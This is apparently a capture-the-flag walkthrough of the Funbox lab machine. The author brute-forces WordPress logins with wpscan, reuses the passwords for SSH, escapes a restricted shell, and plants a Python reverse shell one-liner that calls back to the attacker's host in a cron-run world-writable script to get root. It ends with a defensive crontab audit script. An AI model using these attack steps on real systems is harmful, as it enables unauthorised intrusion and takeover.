Walkthrough

IP of the target : 192.168.1.13

As usual I started with an nmap scan to find open ports and services, using the command shown below:

nmap -sC -sV -Pn -p- -T4 --max-rate=1000 -o nmap.txt 192.168.1.13
Nmap scan report for funbox.lan (192.168.1.13)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      ProFTPD
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  ssl/http Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Funbox – Have fun….
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

Port 21/FTP, 22/SSH, 80/HTTP and 3306/mysql are open. Anonymous login is not allowed for FTP, so let's move forward with port 80. Opening it in the browser gives the error "funbox.fritz.box's server IP address could not be found", so I solved this problem by editing the /etc/hosts file as:

192.168.1.13    funbox.fritz.box
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now I can access the web application, and from the theme I was sure this is "Just another WordPress website", so I started enumeration using wpscan.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $wpscan --url "http://funbox.fritz.box/" --enumerate u,vp
.
.
.
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] joe
 | Found By: Author Id Brute Forcing - Author Pattern 

So I have two usernames; the next step is to brute-force the passwords of these users using the rockyou.txt wordlist.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $wpscan --url "http://funbox.fritz.box/" --passwords ../../rockyou.txt
.
.
.
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - joe / 12345
[SUCCESS] - admin / iubire
Trying admin / iubire Time: 00:00:12 <                                                                        > (670 / 14344394)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: joe, Password: 12345
 | Username: admin, Password: iubire

That's it, we found the admin user's password. We could log into the admin panel and from there pop a reverse shell as user www-data, but wait: I thought to try these credentials for SSH login first, and yes, I was in as user joe.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ssh joe@192.168.1.13
joe@192.168.1.13's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

Umm, that's nice. Now I started enumerating different directories, but I was unable to change directory: the cd /home command gives the error -rbash: cd: restricted. We have many ways to bypass this.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ssh joe@192.168.1.13 -t "bash --noprofile"
joe@192.168.1.13's password: 
joe@funbox:~$ cd /home
joe@funbox:/home$ 

After some enumeration I found interesting files in the /home/funny/ directory.

joe@funbox:/home/funny$ ls -al
total 47608
drwxr-xr-x 3 funny funny     4096 Jul 18 10:02 .
drwxr-xr-x 4 root  root      4096 Jun 19 11:50 ..
**-rwxrwxrwx 1 funny funny       55 Jul 18 10:15 .backup.sh**
-rw------- 1 funny funny     1462 Jul 18 10:07 .bash_history
-rw-r--r-- 1 funny funny      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25  2020 .bashrc
drwx------ 2 funny funny     4096 Jun 19 10:43 .cache
-rw-rw-r-- 1 funny funny 48701440 Sep 21 08:42 html.tar
-rw-r--r-- 1 funny funny      807 Feb 25  2020 .profile
**-rw-rw-r-- 1 funny funny      162 Jun 19 14:13 .reminder.sh**
-rw-rw-r-- 1 funny funny       74 Jun 19 12:25 .selected_editor
-rw-r--r-- 1 funny funny        0 Jun 19 10:44 .sudo_as_admin_successful
-rw------- 1 funny funny     7791 Jul 18 10:02 .viminfo
joe@funbox:/home/funny$ cat .reminder.sh 
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox

joe@funbox:/home/funny$ 

This message clearly means that .backup.sh is run as user funny, so in the next step I simply edited the .backup.sh file to contain a reverse shell.

joe@funbox:/home/funny$ cat .backup.sh 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.103",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After waiting for some time I got access to user funny's shell. After some more enumeration I couldn't find anything to get root access, so I terminated the current reverse shell and started listening again on the same port, and this time I got a root shell.

┌─[m4g1c14n@parrot]─[~]
└──╼ $nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37192
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ exit

Listening again on same port:

┌─[m4g1c14n@parrot]─[~]
└──╼ $nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37194
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2

And here is the actual catch of this machine.

NOTE: The .backup.sh file is run as a cron job, and after gaining root access I checked the crontab of both users (funny and root) and found this:

This is for user funny:

root@funbox:~# crontab -u funny -l
.
.
.
*/2 * * * * /home/funny/.backup.sh

For user root:

root@funbox:~# crontab -u root -l
.
.
.
*/5 * * * * /home/funny/.backup.sh

So that's the reason I got a root shell by listening again on the same port after some time. I hope you like the walkthrough :)
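The root cause here is a world-writable script in one user's home that root's crontab executes. As an added, defensive example (not part of the original walkthrough), this small Python audit reads `crontab -u USER -l` output and flags entries whose target is writable by other users, or owned by a non-root user while being run by root. The SAMPLE_FS table and every path except /home/funny/.backup.sh are constructed for the demo.

```python
import os
import stat
from types import SimpleNamespace

# Constructed sample filesystem {path: (mode, uid)} mirroring the box: the backup
# script is mode 0777 and owned by uid 1000 (funny), yet root's crontab runs it.
SAMPLE_FS = {
    "/home/funny/.backup.sh": (0o100777, 1000),
    "/usr/local/sbin/backup.sh": (0o100755, 0),
}

def sample_stat(path):
    """Stand-in for os.stat over SAMPLE_FS so the audit runs offline."""
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    mode, uid = SAMPLE_FS[path]
    return SimpleNamespace(st_mode=mode, st_uid=uid)

def command_path(entry):
    """Executable path from one crontab line; None for blanks, comments, VAR=value."""
    line = entry.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    special = line.startswith("@")          # '@reboot cmd' vs 'm h dom mon dow cmd'
    fields = line.split(None, 1 if special else 5)
    if len(fields) < (2 if special else 6):
        return None
    return fields[-1].split()[0]             # first word of the command part

def audit_entry(cron_user, entry, stat_fn=os.stat):
    """Return (path, reason) pairs when another user could alter what this entry runs."""
    path = command_path(entry)
    if path is None or not os.path.isabs(path):
        return []                            # relative commands depend on PATH; skipped here
    try:
        st = stat_fn(path)
    except OSError:
        return [(path, "target missing: check who can create it")]
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if cron_user == "root" and st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid} but executed by root")
    return [(path, r) for r in reasons]

def audit_crontab(cron_user, text, stat_fn=os.stat):
    # Audit every line of `crontab -u USER -l` output; pass stat_fn=os.stat on a live host.
    return [f for line in text.splitlines() for f in audit_entry(cron_user, line, stat_fn)]
```

On a real host the same checks should also cover the script's parent directories, since a writable directory lets a user replace the file even when the file itself is locked down.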

NOTE: The awesome artwork used in this article was created by Anton Fritsler.